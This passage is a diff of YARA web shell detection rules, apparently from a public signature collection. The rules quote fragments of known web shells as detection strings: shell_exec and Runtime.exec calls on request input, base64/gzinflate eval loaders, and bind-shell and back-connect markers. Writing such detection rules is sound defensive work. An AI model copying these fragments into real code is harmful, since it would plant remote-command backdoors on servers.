-		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
-		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s4 = "Writed by DreAmeRz" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend_Php
+rule SIGNATURE_BASE_Dtool_Pro_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8a34f4fd-337d-5eb4-b7b7-4adb1c2b7937"
+		id = "c02c522c-8418-5760-869a-52b41785bebc"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3808-L3820"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4771-L4783"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-		logic_hash = "46bc4063d06b4af3e4e61e1e998d489e974e76f17363c9777b8afc39ff21f698"
+		hash = "366ad973a3f327dfbfb915b0faaea5a6"
+		logic_hash = "e8f8b4ca2ab4607e700e897671fd230280763a70897b8ccfc31b3bcb7f2a1f4a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
-		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
-		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+		$s0 = "r3v3ng4ns\\nDigite"
+		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Remexp_Asp
+rule SIGNATURE_BASE_Telnetd_Pl
 {
 	meta:
-		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		description = "Semi-Auto-generated  - file telnetd.pl.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "900036ce-ff13-5441-bb77-906ea08a4ca0"
+		id = "05b5d247-3133-5902-a2ee-b84fa89c7f32"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3821-L3833"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4784-L4798"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-		logic_hash = "c7da9908a0252e95b47dbc8fbb36aeac1661dc464123aaca036bd51047a31584"
+		hash = "5f61136afd17eb025109304bd8d6d414"
+		logic_hash = "faf21758b311fa4c2d11cd60169e6c9a67282cf739b73664456691361a480419"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "<title>Remote Explorer</title>"
-		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
-		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s0 = "0ldW0lf" fullword
+		$s1 = "However you are lucky :P"
+		$s2 = "I'm FuCKeD"
+		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+		$s4 = "atrix@irc.brasnet.org"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Phvayvv_Php_Php
+rule SIGNATURE_BASE_Php_Include_W_Shell_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "76351a59-8f52-5110-a9b8-36edd59026df"
+		id = "ddcf9031-2ec8-5a86-8326-60e4a699f494"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3834-L3846"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4799-L4810"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "35fb37f3c806718545d97c6559abd262"
-		logic_hash = "503a69a7e2c30cc82eba430082627bb93c459a95f675b968126bf4524c598863"
+		hash = "4e913f159e33867be729631a7ca46850"
+		logic_hash = "a63910d97b7ef447b2cadb7de12943d3dbb6eada27d3097b8acf58d9b65b6f60"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
-		$s1 = "$baglan=fopen($duzkaydet,'w');"
-		$s2 = "PHVayv 1.0"
+		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Klasvayv_Asp
+rule SIGNATURE_BASE_Safe0Ver_Shell__Safe_Mod_Bypass_By_Evilc0Der_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3ca4c20c-f879-55a0-9070-d40fc903f9ae"
+		id = "25971f62-33ee-5ed6-8d72-118be5bd2deb"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3847-L3860"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4811-L4823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
-		logic_hash = "eb1b11e02b075a4e7d28b77cf91ad596a85e4c697a36304ee177d46735965e75"
+		hash = "6163b30600f1e80d2bb5afaa753490b6"
+		logic_hash = "46f6bb38f1175e02b03047c06a7aed968b1c1ce2e28cc4b88e15703040e91592"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
-		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
-		$s3 = "<font color=\"#858585\">www.aventgrup.net"
-		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+		$s0 = "Safe0ver" fullword
+		$s1 = "Script Gecisi Tamamlayamadi!"
+		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_R57Shell_Php_Php
+rule SIGNATURE_BASE_Shell_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		description = "Semi-Auto-generated  - file shell.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3861-L3874"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4824-L4836"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d28445de424594a5f14d0fe2a7c4e94f"
-		logic_hash = "658eec4f3c463ec1a480bcb7ba995b8d81d1fb846832e569751d9f505f0fa87e"
+		hash = "1a95f0163b6dea771da1694de13a3d8d"
+		logic_hash = "dbd08e71dc512f8dcf009150fb4448cd3608291ef9078c7e6b86e6f8d820bd94"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
-		$s2 = "RusH security team"
-		$s3 = "'ru_text12' => 'back-connect"
-		$s4 = "<title>r57shell</title>"
+		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
+		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Rst_Sql_Php_Php
+rule SIGNATURE_BASE_Telnet_Cgi
 {
 	meta:
-		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		description = "Semi-Auto-generated  - file telnet.cgi.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		id = "4ca3dace-cd80-58e4-a4de-47dcc64dac0e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3875-L3888"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4837-L4849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0961641a4ab2b8cb4d2beca593a92010"
-		logic_hash = "d15cf69d9ad8683d2ac1ff09b08b0b26ecaf35df8e45bbd5c3a02c393f88cb34"
+		hash = "dee697481383052980c20c48de1598d1"
+		logic_hash = "689c1d43c64aa7469989686c60fc9ab46acde42fdf3c1157bae1e2b8373c845f"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "C:\\tmp\\dump_"
-		$s1 = "RST MySQL"
-		$s2 = "http://rst.void.ru"
-		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+		$s1 = "W A R N I N G: Private Server"
+		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wh_Bindshell_Py
+rule SIGNATURE_BASE_Ironshell_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		description = "Semi-Auto-generated  - file ironshell.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b7acbfe7-fd28-5832-9af2-1c5befe4bbab"
+		id = "0d63ad03-4d1d-535f-8afe-3edaf1bf4010"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3889-L3901"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4850-L4864"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fab20902862736e24aaae275af5e049c"
-		logic_hash = "e38a4f5c23371705f9bbf2db8e65d68074554edc1022576166e76d40e06bc039"
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+		logic_hash = "23574299ee2bb33c3f71102adf71ac8f09b6f8ece5f798beacb9b2432d297ee7"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "#Use: python wh_bindshell.py [port] [password]"
-		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
-		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+		$s0 = "www.ironwarez.info"
+		$s1 = "$cookiename = \"wieeeee\";"
+		$s2 = "~ Shell I"
+		$s3 = "www.rootshell-team.info"
+		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Lurm_Safemod_On_Cgi
+rule SIGNATURE_BASE_Backdoorfr_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "74e77260-a547-5553-8430-2620f8549f50"
+		id = "5ba2b617-a873-5e80-9cfc-c61cc8d605f3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3902-L3914"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4865-L4876"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5ea4f901ce1abdf20870c214b3231db3"
-		logic_hash = "d308ad6cda92fa437b9a4c46cd1b97fb0138aa8d0010256bda56a64ced1c7875"
+		hash = "91e4afc7444ed258640e85bcaf0fecfc"
+		logic_hash = "40a6fb41a65fd35acb7cdc36fdda90f5dc54b641adc3ba9eaae29c5e46622206"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "Network security team :: CGI Shell" fullword
-		$s1 = "#########################<<KONEC>>#####################################" fullword
-		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_C99Madshell_V2_0_Php_Php
+rule SIGNATURE_BASE_Aspydrv_Asp
 {
 	meta:
-		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b0724920-dc1e-5819-a99b-618a9a7e1eca"
+		id = "4420d13e-7015-5083-ba08-b41bf28b00c2"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3915-L3925"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4877-L4890"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d27292895da9afa5b60b9d3014f39294"
-		logic_hash = "07922511d9dfdd32f6b1f47479fca2063b773024a20dcab6f5cf4d56d66c3397"
-		score = 75
+		hash = "1c01f8a88baee39aa1cebec644bbcb99"
+		logic_hash = "64912d7521d4bff33b5f3a78525bf4ed94246f5933753bed7ca02bedffc85f0f"
+		score = 60
 		quality = 85
 		tags = ""
 
 	strings:
-		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+		$s1 = "password"
+		$s2 = "session(\"shagman\")="
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Backupsql_Php_Often_With_C99Shell
+rule SIGNATURE_BASE_Cmdjsp_Jsp
 {
 	meta:
-		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		id = "048478a8-9622-54c7-80ed-e4e223d14500"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3926-L3937"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4891-L4904"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
-		logic_hash = "7c64e3d4e5815859c51f05cb376f72ea266b31193f3f4588526005e167ebabad"
+		hash = "b815611cc39f17f05a73444d699341d4"
+		logic_hash = "8b0e425c7d71ea2c536192ff186665e7f0fbdbc0e0d195d7107ac57cf9bd1773"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
-		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s2 = "cmdjsp.jsp"
+		$s3 = "michaeldaw.org" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Uploader_Php_Php
+rule SIGNATURE_BASE_H4Ntu_Shell__Powered_By_Tsoi_
 {
 	meta:
-		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "62aa783b-f12f-5bb5-9d96-7aee1666788b"
+		id = "186358e6-88a3-5fad-b1ba-a49b2a5dea1c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3938-L3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4905-L4916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b53b67bb3b004a8681e1458dd1895d0"
-		logic_hash = "6e6ffc4cad2a956cb2b6667928bac5996cf95cd36f43ba789144c46726471f07"
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "32c620a4ed3f7a8640928e2211516978c12cfbdedb7d96e923303740407b5a1c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
-		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
-		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+		$s0 = "h4ntu shell"
+		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Telnet_Pl
+rule SIGNATURE_BASE_Ajan_Asp
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		description = "Semi-Auto-generated  - file Ajan.asp.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "be4de017-e929-5dd3-a60e-f187456b1a55"
+		id = "6040fd88-b992-5110-8b37-7711ace30b1a"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3951-L3962"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4917-L4929"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dd9dba14383064e219e29396e242c1ec"
-		logic_hash = "2d1abc52fc70ce664a19e49e6fa4175bc8d8785dee332d5273323479d9628a8c"
+		hash = "b6f468252407efc2318639da22b08af0"
+		logic_hash = "13988af864a62ca04501288d4f2d830815ab453b14cef6795fe993db1dd1a9ef"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "W A R N I N G: Private Server"
-		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+		$s1 = "c:\\downloaded.zip"
+		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+		$s3 = "http://www35.websamba.com/cybervurgun/"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_W3D_Php_Php
+rule SIGNATURE_BASE_PHANTASMA_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1a4e3c84-2d3b-5245-bccc-9a5f59b9fc17"
+		id = "21ff4cee-9cdc-57d1-9c43-e033fdb47de0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3963-L3975"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4930-L4943"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "987f66b29bfb209a0b4f097f84f57c3b"
-		logic_hash = "33f948a1ae4474daddd788df84fa8baabf4390ec242cad9a6a51dac0152d3b75"
+		hash = "52779a27fa377ae404761a7ce76a5da7"
+		logic_hash = "d4a2a1bcc1ff3264b35f2b05d7de664b56807977f2a793fd87206f046a185d3b"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "W3D Shell"
-		$s1 = "By: Warpboy"
-		$s2 = "No Query Executed"
+		$s0 = ">[*] Safemode Mode Run</DIV>"
+		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+		$s2 = "[*] Spawning Shell"
+		$s3 = "Cha0s"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Cgi
+rule SIGNATURE_BASE_Mysql_Web_Interface_Version_0_8_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b768bb72-64e8-545a-9123-3d5889b58a82"
+		id = "90616d2d-082b-5983-a859-62d1c5b8066e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3976-L3987"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4944-L4957"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
-		logic_hash = "8908ced96284de6b6d5ae693ba54c49a6333bbe5780d951cbacc91b4dde027df"
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+		logic_hash = "f0a20870a3240948e3ef1ad61685b00c5fc90d6098b87af9ac43ab44ccd13c9e"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "WebShell.cgi"
-		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+		$s0 = "SooMin Kim"
+		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Winx_Shell_Html
+rule SIGNATURE_BASE_Simple_Cmd_Html
 {
 	meta:
-		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fe02d995-4375-5ce9-aabe-fae5d29278d3"
+		id = "30990574-02a0-5eed-8317-847b6be13300"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3988-L4000"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4958-L4971"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-		logic_hash = "4248f807d66990946523ba7b92d795c2c40429182389d9bf3f4a972e246b50c6"
+		hash = "c6381412df74dbf3bcd5a2b31522b544"
+		logic_hash = "56b5b9e5518fa8a4be8c48735e997a538b0e534ad8fd72c1419dc0e8353bbc00"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "WinX Shell"
-		$s1 = "Created by greenwood from n57"
-		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+		$s1 = "<title>G-Security Webshell</title>" fullword
+		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dx_Php_Php
+rule SIGNATURE_BASE__1_C2007_Php_Php_C100_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "67d0bccb-d39a-5e30-bdc0-801525ebddd7"
+		id = "00ada6a4-a32a-5184-867d-e10a8c95c41c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4001-L4013"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4972-L4986"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-		logic_hash = "ab43ddcf317eb4db890ca9750dc6bbc19b06b806339a67c82216df02bc2e8446"
+		logic_hash = "6f6cb7c210bcd0f84c2ccff52850b1d673622ae49b83d614d63b5bbba7392327"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash1 = "d089e7168373a0634e1ac18c0ee00085"
+		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
